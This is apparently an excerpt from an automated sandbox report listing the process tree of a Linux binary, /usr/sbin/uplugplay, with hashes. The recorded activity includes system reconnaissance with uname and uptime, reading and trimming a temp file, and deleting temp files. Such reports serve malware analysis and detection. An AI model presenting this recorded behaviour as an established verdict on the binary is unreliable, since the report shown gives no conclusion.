                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/uptime
                                                                                        Arguments:uptime
                                                                                        File size:14568 bytes
                                                                                        MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                                                                                        Start time:00:03:15
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/sbin/uplugplay
                                                                                        Arguments:n/a
                                                                                        File size:426540 bytes
                                                                                        MD5 hash:82e6b25291d35cee856681da70aae3fd

                                                                                        Start time:00:03:15
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "uname -a"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:15
                                                                                        Start date:26/01/2022
                                                                                        Path:/bin/sh
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:15
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/uname
                                                                                        Arguments:uname -a
                                                                                        File size:39288 bytes
                                                                                        MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                                                                                        Start time:00:03:16
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/dash
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:16
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/cat
                                                                                        Arguments:cat /tmp/tmp.hDfDW3v72C
                                                                                        File size:43416 bytes
                                                                                        MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                        Start time:00:03:16
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/dash
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:16
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/head
                                                                                        Arguments:head -n 10
                                                                                        File size:47480 bytes
                                                                                        MD5 hash:fd96a67145172477dd57131396fc9608

                                                                                        Start time:00:03:16
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/dash
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:16
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/tr
                                                                                        Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                                                        File size:51544 bytes
                                                                                        MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                                                        Start time:00:03:16
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/dash
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:16
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/cut
                                                                                        Arguments:cut -c -80
                                                                                        File size:47480 bytes
                                                                                        MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                                                        Start time:00:03:17
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/dash
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:17
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/cat
                                                                                        Arguments:cat /tmp/tmp.hDfDW3v72C
                                                                                        File size:43416 bytes
                                                                                        MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                        Start time:00:03:17
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/dash
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:17
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/head
                                                                                        Arguments:head -n 10
                                                                                        File size:47480 bytes
                                                                                        MD5 hash:fd96a67145172477dd57131396fc9608

                                                                                        Start time:00:03:17
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/dash
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:17
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/tr
                                                                                        Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                                                        File size:51544 bytes
                                                                                        MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                                                        Start time:00:03:17
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/dash
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:17
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/cut
                                                                                        Arguments:cut -c -80
                                                                                        File size:47480 bytes
                                                                                        MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                                                        Start time:00:03:17
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/dash
                                                                                        Arguments:n/a
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time:00:03:17
                                                                                        Start date:26/01/2022
                                                                                        Path:/usr/bin/rm
                                                                                        Arguments:rm -f /tmp/tmp.hDfDW3v72C /tmp/tmp.cWP5WAFbt1 /tmp/tmp.FmPMX5ZHi1
                                                                                        File size:72056 bytes
                                                                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b